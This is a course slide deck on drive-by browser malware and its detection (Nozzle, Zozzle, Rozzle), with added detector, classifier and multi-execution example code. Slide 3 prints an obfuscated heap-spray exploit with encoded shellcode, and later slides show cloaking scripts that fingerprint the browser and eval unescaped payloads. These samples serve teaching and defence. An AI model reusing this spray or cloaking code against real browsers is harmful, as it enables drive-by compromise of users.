CSE484/CSE584 DRIVE-BY MALWARE, Dr. Benjamin Livshits (slide deck)


  1. CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits

  2. Homework, Labs, and Project 2
  • HW-3 due Friday
  • Lab-3 due Tuesday
  • We want to give you more time to focus on the project
  • sql3, xss7 and xss8 are now extra credit
  • Please be ready to give a short 2-minute pitch about your strategy
  • Ask more questions; we are here to help
  • There's no need to feel stuck: we want you to spend your time well and learn a lot from the process

  3. See Anything in Common

  // shellcode, %u-encoded (one UTF-16 code unit = two heap bytes)
  var MuqEZYdx = "%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01…";
  // sled unit: 0x0C0C doubles as both "nop-like" bytes and the sprayed address
  var avIztsbF = "%u0C0C%u0C0C";
  var TzsygYnD = "%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA";
  var eSSOLKOd = unescape(MuqEZYdx);
  var pbIkPrKa = new Array();
  var wSqaQK = 1000;
  var xASdnqwj = 0x100000;                 // 1 MB per sprayed block
  var xAFKNqwO = 2;                        // bytes per code unit
  var oQkmsLLP = 0x01020;                  // slack for string header / allocator rounding
  var EibcUrHC = xASdnqwj - (eSSOLKOd.length * xAFKNqwO + oQkmsLLP);
  var cTAfWBbz = unescape(avIztsbF);
  var oKqMlPqL = 0xC0;                     // 192 blocks, ~192 MB of sprayed heap
  while (cTAfWBbz.length < EibcUrHC / xAFKNqwO) { cTAfWBbz += cTAfWBbz; }   // grow the sled by doubling
  var GBVpRAcd = cTAfWBbz.substring(0, EibcUrHC / xAFKNqwO);
  delete cTAfWBbz;
  for (JyxIaABZ = 0; JyxIaABZ < oKqMlPqL; JyxIaABZ++) { pbIkPrKa[JyxIaABZ] = GBVpRAcd + eSSOLKOd; }   // sled + shellcode, kept alive in an array
  CollectGarbage();
  var fseYOuUZ = unescape(TzsygYnD);
  var wxDSxsOR = new Array();
  for (var FNMszcqR = 0; FNMszcqR < wSqaQK; FNMszcqR++) wxDSxsOR.push(document.createElement("img"));   // heap grooming with DOM objects
  function FKOASMamskASDweqnbjdwasSDQWWQq() {
    vVLUmYRf = document.createElement("tbody");
    vVLUmYRf.click;
    var wycLwNIo = vVLUmYRf.cloneNode();
    …

  4. Detecting Drive-By Malware
  • VM-based detection
  • Static or statistical analysis of code
  • Runtime observations
  • Done in data centers and in user browsers
  • Generally, pre-scanning of URLs is preferable. Why? What are the downsides?

  5. Browsers Consume URL Blacklists

  6. But Also Search Engines

  7. Safe Browsing Diagnostics

  8. VM-Based Detection (HoneyMonkey)
  • Runtime detection
  • Put a (possibly vulnerable) browser into a VM
  • Equip it with some plugins
  • Visit a possibly malicious site
  • See if anything interesting happens
  • Why use a VM?
  • What if nothing happens? What can you conclude?
  • How would malware hide from you?

  9. Runtime Detection
  • Focusing on heap sprays, very common in the 2008-2012 time frame
  • Monitor the browser heap looking for evidence of spraying
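Added example (not code from the slides, and not Nozzle's algorithm): a simplified runtime heap-spray monitor. Nozzle interprets heap blocks as x86 and measures how much of a block a random landing point would execute through; the proxy below is the fraction of a block covered by a short repeating pattern (a sled), combined with how many large same-sized blocks look like that. It first rebuilds the spray from slide 3 at a reduced size with the same doubling loop, then runs the detector over that heap and over a constructed benign one. The payload bytes, thresholds and the benign heap are all assumptions for the example.

```javascript
// Added example, not code from the slides and not Nozzle's algorithm:
// a sled-density heap-spray detector. Thresholds are assumptions.

// Rebuild a spray the way the slide-3 sample does: a sled doubled until it
// fills the block, a payload appended, many identical blocks kept alive.
// The payload is a constructed placeholder (NOPs and int3), not shellcode.
function buildSpray(blockCount, blockUnits, sledUnit, payload) {
  const target = blockUnits - payload.length;
  let sled = sledUnit;
  while (sled.length < target) sled += sled;   // the while / += doubling loop
  sled = sled.substring(0, target);
  const blocks = [];
  for (let i = 0; i < blockCount; i++) blocks.push(sled + payload);
  return blocks;
}

// A JS string is UTF-16 code units; unescape("%u0C0C") is one unit stored as
// bytes 0C 0C. Expand a string to the bytes the browser heap would hold.
function toBytes(str) {
  const out = new Uint8Array(str.length * 2);
  for (let i = 0; i < str.length; i++) {
    const cu = str.charCodeAt(i);
    out[2 * i] = cu & 0xff;      // little-endian
    out[2 * i + 1] = cu >> 8;
  }
  return out;
}

// Longest run that repeats with period 1..4, as a fraction of the block.
// A sled of 0C 0C 0C ... scores ~1.0; text, pointers and DOM data score low.
function sledRatio(bytes) {
  let best = 0;
  for (let period = 1; period <= 4; period++) {
    let run = period, longest = period;
    for (let i = period; i < bytes.length; i++) {
      if (bytes[i] === bytes[i - period]) { run++; if (run > longest) longest = run; }
      else run = period;
    }
    best = Math.max(best, longest / bytes.length);
  }
  return best;
}

// Scan a snapshot of heap blocks. Report a spray when enough large blocks are
// sled-dominated and share one size (a spray allocates identical chunks).
function analyseHeap(blocks, opts = {}) {
  const minBlockBytes = opts.minBlockBytes ?? 64 * 1024;   // assumption
  const sledThreshold = opts.sledThreshold ?? 0.9;         // assumption
  const minSuspectBlocks = opts.minSuspectBlocks ?? 16;    // assumption
  const bySize = new Map();
  let suspect = 0, suspectBytes = 0;
  for (const block of blocks) {
    const bytes = toBytes(block);
    if (bytes.length < minBlockBytes) continue;            // skip small objects
    if (sledRatio(bytes) < sledThreshold) continue;
    suspect++;
    suspectBytes += bytes.length;
    bySize.set(bytes.length, (bySize.get(bytes.length) || 0) + 1);
  }
  const maxSameSize = Math.max(0, ...bySize.values());
  return {
    suspect, suspectBytes, maxSameSize,
    spray: suspect >= minSuspectBlocks && maxSameSize >= minSuspectBlocks,
  };
}

// Constructed benign heap: large text buffers plus many small DOM-like strings.
function benignHeap() {
  const text = "The quick brown fox jumps over the lazy dog. ".repeat(1500);
  const blocks = [];
  for (let i = 0; i < 40; i++) blocks.push(text + i);
  for (let i = 0; i < 1000; i++) blocks.push("img");
  return blocks;
}

// Stand-alone demo: the slide-3 spray at reduced size vs the benign heap.
const SLED = String.fromCharCode(0x0c0c);                    // unescape("%u0C0C")
const PAYLOAD = String.fromCharCode(0x9090, 0x9090, 0xcccc); // placeholder bytes
console.log(analyseHeap(buildSpray(32, 64 * 1024, SLED, PAYLOAD)));
console.log(analyseHeap(benignHeap()));
```

The two knobs that matter in practice are the block-size floor (sprays use large, uniform chunks so the sled reaches the sprayed address) and the same-size count: a handful of sled-like buffers is normal (image rows, zero-filled arrays), dozens of identical ones are not.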

  10. Statistical Detection
  • Observe patterns in the code
  • Train machine learning classifiers
  • Combine with de-obfuscation
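Added example, not Zozzle's implementation: Zozzle trains a naive Bayes classifier over features drawn from the JavaScript AST (a context node plus the text under it). The version below keeps the classifier and exposes its decision as per-feature log-odds, but uses regex features over source text so it needs no parser. Every training and held-out snippet is constructed for this example; the malicious ones imitate the patterns on these slides (unescape/%u payloads, eval, ActiveXObject probes, split hex-escaped strings, iframe injection), the benign ones ordinary page code. Feature names and the two-class corpus are assumptions.

```javascript
// Added example, not Zozzle's code: Bernoulli naive Bayes over regex features.

const FEATURES = {
  unescape:        /\bunescape\s*\(/,
  ucodeString:     /%u[0-9a-fA-F]{4}/,             // %uXXXX shellcode/sled encoding
  evalCall:        /\beval\s*\(/,
  activeX:         /\bActiveXObject\s*\(/,         // plugin probing
  hexEscapeConcat: /\\x[0-9a-fA-F]{2}"\s*\+\s*"/,  // "\x6D"+"\x73" string splitting
  iframeWrite:     /document\.write\s*\(\s*["'][^"']*<iframe/,
  userAgentCheck:  /navigator\.userAgent/,
  selfDoubling:    /(\w+)\s*\+=\s*\1\b/,           // s += s sled growth
  collectGarbage:  /\bCollectGarbage\s*\(/,
  domListener:     /\baddEventListener\s*\(/,
  jsonUse:         /\bJSON\.(parse|stringify)\b/,
};

function extractFeatures(src) {
  const present = new Set();
  for (const [name, re] of Object.entries(FEATURES)) if (re.test(src)) present.add(name);
  return present;
}

class NaiveBayes {
  constructor() { this.counts = { malicious: { n: 0, f: {} }, benign: { n: 0, f: {} } }; }
  train(src, label) {
    const c = this.counts[label];
    c.n++;
    for (const f of extractFeatures(src)) c.f[f] = (c.f[f] || 0) + 1;
  }
  // P(feature present | class), Laplace-smoothed so unseen features never give log(0).
  logProb(label, f, present) {
    const c = this.counts[label];
    const p = ((c.f[f] || 0) + 1) / (c.n + 2);
    return Math.log(present ? p : 1 - p);
  }
  classify(src) {
    const present = extractFeatures(src);
    let logOdds = Math.log(this.counts.malicious.n / this.counts.benign.n); // class prior
    const contributions = {};
    for (const f of Object.keys(FEATURES)) {
      const d = this.logProb("malicious", f, present.has(f)) - this.logProb("benign", f, present.has(f));
      contributions[f] = d;     // how much this feature (present or absent) moved the decision
      logOdds += d;
    }
    return { malicious: logOdds > 0, logOdds, present: [...present], contributions };
  }
}

// Constructed training corpus (String.raw keeps the \x escapes literal).
const MALICIOUS = [
  String.raw`var s = unescape("%u56e8%u0000%u5300"); var sled = unescape("%u0C0C%u0C0C"); while (sled.length < n) sled += sled; CollectGarbage();`,
  String.raw`if (navigator.userAgent.toLowerCase().indexOf("\x6D"+"\x73\x69\x65"+"\x20\x36")>0) document.write("<iframe src=x6.htm></iframe>");`,
  String.raw`var adobe=new ActiveXObject('AcroPDF.PDF'); if (navigator.userAgent.indexOf('IE 6')>=0) { var x=unescape('%u4149%u1982'); eval(x); }`,
  String.raw`try { var f=new ActiveXObject("O"+"\x57\x43"+"\x31\x30"); } catch (c) { } finally { setTimeout("document.write(aacc)", 3500); }`,
];
const BENIGN = [
  String.raw`form.addEventListener('submit', function (e) { if (!/\S+@\S+/.test(email.value)) e.preventDefault(); });`,
  String.raw`var data = JSON.parse(xhr.responseText); for (var i = 0; i < data.length; i++) list.appendChild(render(data[i]));`,
  String.raw`function debounce(fn, ms) { var t; return function () { clearTimeout(t); t = setTimeout(fn, ms); }; }`,
  String.raw`window.addEventListener('load', function () { document.querySelectorAll('img[data-src]').forEach(function (img) { img.src = img.dataset.src; }); });`,
];

function trainedClassifier() {
  const nb = new NaiveBayes();
  for (const s of MALICIOUS) nb.train(s, "malicious");
  for (const s of BENIGN) nb.train(s, "benign");
  return nb;
}

// Held-out samples, also constructed: one shaped like the slide-20 script, one benign.
const HELDOUT_MALICIOUS = String.raw`var adobe=new ActiveXObject('AcroPDF.PDF'); var v=adobe.GetVariable('$version'); if (navigator.userAgent.indexOf('IE 7')>=0 && v=='9.1.3') { var x=unescape('%u4149%u1982'); eval(x); }`;
const HELDOUT_BENIGN = String.raw`var cfg = JSON.parse(el.getAttribute('data-config')); el.addEventListener('click', function () { toggle(cfg.target); });`;

const clf = trainedClassifier();
console.log(clf.classify(HELDOUT_MALICIOUS));   // malicious: true, with each feature's share
console.log(clf.classify(HELDOUT_BENIGN));      // malicious: false
```

The `contributions` map is the part worth keeping when you do this for real: it shows which features carried a verdict, which is how you notice that a single textual trigger (say, `unescape`) is doing all the work and would be trivially evaded by the de-obfuscation-resistant tricks on the following slides.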

  11. ROZZLE

  12. Online … an example pulled from our DB…

  if (navigator.userAgent.toLowerCase().indexOf("\x6D"+"\x73\x69\x65"+"\x20\x36")>0)
    document.write("<iframe src=x6.htm></iframe>");
  if (navigator.userAgent.toLowerCase().indexOf("\x6D"+"\x73"+"\x69"+"\x65"+"\x20"+"\x37")>0)
    document.write("<iframe src=x7.htm></iframe>");
  try { var a; var aa=new ActiveXObject("Sh"+"ockw"+"av"+"e"+"Fl"+[…]); } catch (a) { } finally {
    if (a!="[object Error]") document.write("<iframe src=svfl9.htm></iframe>");
  }
  try { var c; var f=new ActiveXObject("O"+"\x57\x43"+"\x31\x30\x2E\x53"+[…]); } catch (c) { } finally {
    if (c!="[object Error]") {
      aacc = "<iframe src=of.htm></iframe>";
      setTimeout("document.write(aacc)", 3500);
    }
  }

  Annotations on the slide (what the split strings decode to):
  "\x6D"+"\x73\x69\x65"+"\x20\x36" = "msie 6"
  "\x6D"+"\x73"+"\x69"+"\x65"+"\x20"+"\x37" = "msie 7"
  "O"+"\x57\x43"+"\x31\x30\x2E\x53"+"pr"+"ea"+"ds"+"he"+"et" = "OWC10.Spreadsheet"

  13. Environment Fingerprinting Prevents Detection

  Two cloaked samples (the slide labels its two columns Nozzle and Zozzle):

  <script>
  if (navigator.userAgent.indexOf('IE 6')>=0) {
    var x=unescape('%u4149%u1982%u90 […]');
    eval(x);
  }
  </script>

  <script>
  var adobe=new ActiveXObject('AcroPDF.PDF');
  var adobeVersion=adobe.GetVariable('$version');
  if (navigator.userAgent.indexOf('IE 6')>=0 && adobeVersion == '9.1.3') {
    var x=unescape('%u4149%u1982%u90 […]');
    eval(x);
  }
  </script>

  • In 7.7% of JS files, code gets a reference to the environment
  • In 1.2%, code branches on such sensitive values
  • 89.5% of malicious JS branches on such values
  • Is this a practical problem for our malware detectors?

  14. Typical Malware Cloaking

  15. More Complex Fingerprinting
  Fingerprint: Q0193807F127J14

  16. Avoiding Dynamic Crawlers

  17. Avoiding Static Detection

  18. How to Allocate Detection Resources?
  [Figure: version tree rooted at Rozzle; browser versions 8, 9, 10; plugin versions 1.4, 1.5, 2.0, … 9.0, 9.1, … 10.0]
  • How many resources should be allocated to filter malicious sites?
  • Clearly does not scale
  • What if the site simply is not malicious?

  19. Rozzle: Multi-path execution framework for JavaScript

  What it is/does:
  • Multiple browser profiles on a single machine
  • Branch on environment-sensitive checks, similar to running multiple browsers in parallel
  • Execute individual branches sequentially to increase coverage

  What it is not:
  • Cluster of machines: too resource consuming
  • Symbolic execution: no reverting to a previous state, no forking, no snapshotting
  • Static analysis: retains much of runtime precision

  20. Multi-Execution in Rozzle

  <script>
  var adobe=new ActiveXObject('AcroPDF.PDF');
  var adobeVersion=adobe.GetVariable('$version');
  if (navigator.userAgent.indexOf('IE 7')>=0 && adobeVersion == '9.1.3') {
    var x=unescape('%u4149%u1982%u90 […]');
    eval(x);
  } else if (adobeVersion == '8.0.1') {
    var x=unescape('%u4073%u8279%u77 […]');
    eval(x);
  }
  …
  </script>
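Added example, not Rozzle's code: a miniature multi-execution harness for the environment-dependent branches shown on slides 12, 13 and 20. Values obtained from the environment are wrapped so their dependence is visible, and any conditional whose test depends on such a value executes both arms, one after the other, on the same heap: no forking and no snapshotting, as slide 19 describes. The script under test is a stand-in for the slide-20 sample with `ActiveXObject`/`eval` replaced by harness calls; the `EnvValue` class, `multiIf`, the `evalSink` recorder, the browser profiles and the payload strings are all assumptions for the example.

```javascript
// Added example, not Rozzle's code: sequential multi-execution of
// environment-dependent conditionals, with eval() replaced by a recorder.

// A value derived from the environment. Operations on it stay wrapped, so
// `ua.indexOf('IE 7').ge(0)` is still marked as environment-dependent.
class EnvValue {
  constructor(value) { this.value = value; }
  toLowerCase() { return new EnvValue(String(this.value).toLowerCase()); }
  indexOf(s)    { return new EnvValue(String(this.value).indexOf(s)); }
  ge(n)         { return new EnvValue(this.value >= n); }
  eq(v)         { return new EnvValue(this.value == v); }
  and(other)    { return new EnvValue(concrete(this) && concrete(other)); }
}
const concrete = (v) => (v instanceof EnvValue ? Boolean(v.value) : Boolean(v));

// mode 'single': ordinary execution against one concrete browser profile.
// mode 'multi':  both arms of every environment-dependent branch run in order.
function makeHarness(profile, mode) {
  const h = {
    revealed: [],   // code strings that reached eval()
    trace: [],      // which conditionals were multi-executed
    env: (name) => new EnvValue(profile[name]),          // navigator / plugin lookups
    evalSink: (code) => h.revealed.push(code),           // stands in for eval()
    multiIf(cond, thenFn, elseFn) {
      if (mode === "multi" && cond instanceof EnvValue) {
        h.trace.push(`multi-executed (concrete value was ${concrete(cond)})`);
        thenFn();                 // both arms run sequentially, sharing state
        if (elseFn) elseFn();
        return;
      }
      if (concrete(cond)) thenFn(); else if (elseFn) elseFn();
    },
  };
  return h;
}

// Stand-in for the slide-20 script: two exploit paths gated on browser and
// Acrobat version. Payload strings are constructed placeholders.
function sampleScript(h) {
  const ua = h.env("userAgent");                // navigator.userAgent
  const adobeVersion = h.env("adobeVersion");   // AcroPDF.PDF GetVariable('$version')
  h.multiIf(ua.indexOf("IE 7").ge(0).and(adobeVersion.eq("9.1.3")),
    () => h.evalSink("PAYLOAD-A (IE 7 + Acrobat 9.1.3)"),
    () => h.multiIf(adobeVersion.eq("8.0.1"),
      () => h.evalSink("PAYLOAD-B (Acrobat 8.0.1)")));
}

function run(profile, mode) {
  const h = makeHarness(profile, mode);
  sampleScript(h);
  return { revealed: h.revealed, trace: h.trace };
}

// Constructed profiles: a crawler's own browser, which the script ignores when
// run normally, and the victim profile the script is looking for.
const CRAWLER = { userAgent: "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", adobeVersion: "10.0" };
const VICTIM  = { userAgent: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)", adobeVersion: "9.1.3" };

console.log(run(CRAWLER, "single").revealed);   // []: nothing to detect
console.log(run(VICTIM, "single").revealed);    // PAYLOAD-A only
console.log(run(CRAWLER, "multi").revealed);    // both payloads from one run on one profile
```

The point of the third call is the one slide 18 makes: the crawler does not need a profile per (browser, plugin) version pair, because the unescaped payloads reach `eval` on every path in a single execution, where Nozzle or Zozzle can then see them. The trade-off, visible in `multiIf`, is that the else-arm runs on state the then-arm already modified, which Rozzle accepts in exchange for not snapshotting.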

  21. Experiments

  Offline
  • Controlled experiment
  • 7x more Nozzle detections

  Online
  • Similar to Bing crawling
  • Almost 4x more Nozzle detections
  • 10.1% more Zozzle detections

  Overhead
  • 1.1% runtime overhead
  • 1.4% memory overhead
